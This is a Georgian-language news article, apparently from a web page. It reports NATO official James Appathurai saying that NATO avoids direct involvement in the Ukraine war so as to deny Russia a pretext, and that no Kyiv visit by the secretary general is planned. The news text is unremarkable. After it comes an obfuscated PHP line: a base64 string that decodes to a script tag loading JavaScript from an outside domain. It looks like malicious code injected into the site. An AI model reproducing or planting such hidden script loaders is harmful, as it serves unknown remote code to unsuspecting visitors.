celsiusi
ავერსი შნაიდერი
ნატო ცდილობს გაიაროს ძალიან დელიკატურ ხაზზე და დაიცვას ბალანსი. იმაზე უარესი, რაც ახლა ხდება უკრაინაში, იქნება საერთო ომი მთელს ევროპაში და ჩვენ ამ შესაძლებლობასთან მიახლოებაც კი არ გვსურს,- ამის შესახებ ნატოს გენერალური მდივნის თანაშემწის მოადგილემ ჯეიმს აპატურამ „ინტერპრესნიუსისთვის“ მიცემულ ინტერვიუში აცხადებს.
 
როგორც ჯეიმს აპატურაი განმარტავს, ნატოს არ სურს რუსეთს იმის თქმის მიზეზი მისცეს, რომ ალიანსი რამენაირად ჩართულია კონფლიქტში.
 
„ნატო ცდილობს გაიაროს ძალიან დელიკატურ ხაზზე და დაიცვას ბალანსი, რადგან, რა თქმა უნდა, რუსეთის ხელისუფლება და პრეზიდენტ პუტინი ნატო-ს ინსტრუმენტალიზებას ახდენს მის კომუნიკაციაში და ნატო ცდილობს ალიანსის დაცვას და მხარდაჭერით უზრუნველყოს პარტნიორები. პირდაპირი დახმარება უკრაინას მიეწოდება ნატო-ს მოკავშირეებისგან და სხვა ქვეყნებისგან, მაგრამ არა ნატო-სგან, როგორც ალიანსისგან. ჩვენ არ გვსურს რუსეთის ხელისუფლებას მიზეზი მივცეთ, რომ ნატო რამენაირად ერევა ამ კონფლიქტში. იმაზე უარესი, რაც ახლა ხდება უკრაინაში, იქნება საერთო ომი მთელს ევროპაში და ჩვენ ამ შესაძლებლობასთან მიახლოებაც კი არ გვსურს“,- განაცცხადა ჯეიმს აპატურაიმ.
 
მისივე თქმით, სრაფად მზარდია ნატო-ს მიერ უკრაინის დახმარების ტემპი, მათ შორის შეიარაღებით.
 
რაც შეეხება იმას, აპირებს თუ არა უკრაინაში ჩასვლას ნატო-ს გენერალური მდივანიც იმის გათვალისწინებით, რომ კიევს უკვე ესტუმრა როგორც ცალკეული ქვეყნის არაერთი ლიდერი, ისე ევროკავშირის ხელმძღვანელი პირები, აპატურაის თქმით, ეს არ იგეგმება.
 
„არ ვფიქრობ, რომ ეს იგეგმება, ყოველ შემთხვევაში მე არ მაქვს ინფორმაცია იმასთან დაკავშირებით, რომ ნატო-ს გენერალური მდივანი გეგმავდეს უკრაინაში ვიზიტს“, - აღნიშნავს ის.
845
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");